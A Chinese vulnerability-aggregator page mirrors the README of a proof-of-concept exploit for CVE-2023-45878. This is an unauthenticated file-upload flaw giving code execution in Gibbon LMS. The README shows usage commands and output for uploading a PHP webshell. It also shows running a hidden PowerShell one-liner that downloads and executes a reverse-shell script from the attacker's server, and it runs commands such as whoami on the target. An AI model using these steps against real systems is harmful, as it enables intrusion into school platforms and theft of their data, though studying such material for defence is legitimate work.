漏洞平台

POC详情： 9108c23b5dc95d7e0fc9ad4a533f8278713687f1

来源

https://github.com/PaulDHaes/CVE-2023-45878-POC

关联漏洞

标题： Gibbon 安全漏洞 (CVE-2023-45878)
描述：Gibbon是一个解决教育工作者每天遇到的实际问题的学校平台。 GibbonEdu Gibbon 25.0.1版本存在安全漏洞，该漏洞源于允许未经身份验证的攻击者将任意文件上传到应用程序，并在底层系统上执行代码。

描述

CVE-2023-45878 poc for gibbon LMS on xampp windows

介绍

# CVE-2023-45878-POC
CVE-2023-45878 poc for gibbon LMS on xampp windows.
Upload a webshell called shell.php for command injection.
For reverse shell uploads a powershell reverse shell ps1 script called shell.ps1 which is uploaded to the target machine using the shell.php.

# Requirments
Python3
Requests python3 module
netcat
```
pip3 install requests
```
## Virtual env
```shell
mkdir CVE-2023-45878
cd CVE-2023-45878
python3 -m venv CVE
source CVE/bin/activate
cd ..
pip3 install requests
```

# Usage
Tested on Gibbon LMS that was running in XAMPP windows no AV enabled.
Target can be found using the login page of Gibbon example http://gibbon-example/Gibbon-LMS/

## Reverse shell
```shell
python3 reverse.py --reverse-shell -target_url http://target -ip IP -port REV-PORT -srvport SRVPORT
```
### Result
```text
[+] PHP shell uploaded successfully to http://target/shell.php
[+] PowerShell reverse shell script saved to: shell.ps1
[+] The shell is now hosted at shell.ps1
Starting reverse shell listener in background...
Starting netcat listener on ip:REV-PORT...
[+] HTTP server running in the background on port SRVPORT
[+] Executing PHP shell to download and execute shell.ps1
Executing: http://target/shell.php?cmd=powershell%20-nop%20-w%20hidden%20-c%20IEX%20%28New-Object%20Net.WebClient%29.DownloadString%28%27http%3A//IP%3ASRVPORT/shell.ps1%27%29
[+] HTTP server started on http://0.0.0.0:SRVPORT/
TARGET-IP - - [20/Mar/2025 12:59:11] "GET /shell.ps1 HTTP/1.1" 200 -
Connection from TARGET-IP

PS C:\xampp\htdocs\Gibbon-LMS>
```

## Single command
```shell
python3 reverse.py --single -target_url http://target -command whoami
```
### Result
```text
[+] PHP shell uploaded successfully to http://target/shell.php
[+] Executing PHP command
Executing: http://target/shell.php?whoami
[+] Command executed successfully pres enter
vuln\w.webservice
```

# Credits
https://herolab.usd.de/security-advisories/usd-2023-0025/

文件快照


 [4.0K]  /data/pocs/9108c23b5dc95d7e0fc9ad4a533f8278713687f1
├── [6.6K]  CVE-2023-45878.py
└── [1.9K]  README.md

0 directories, 2 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。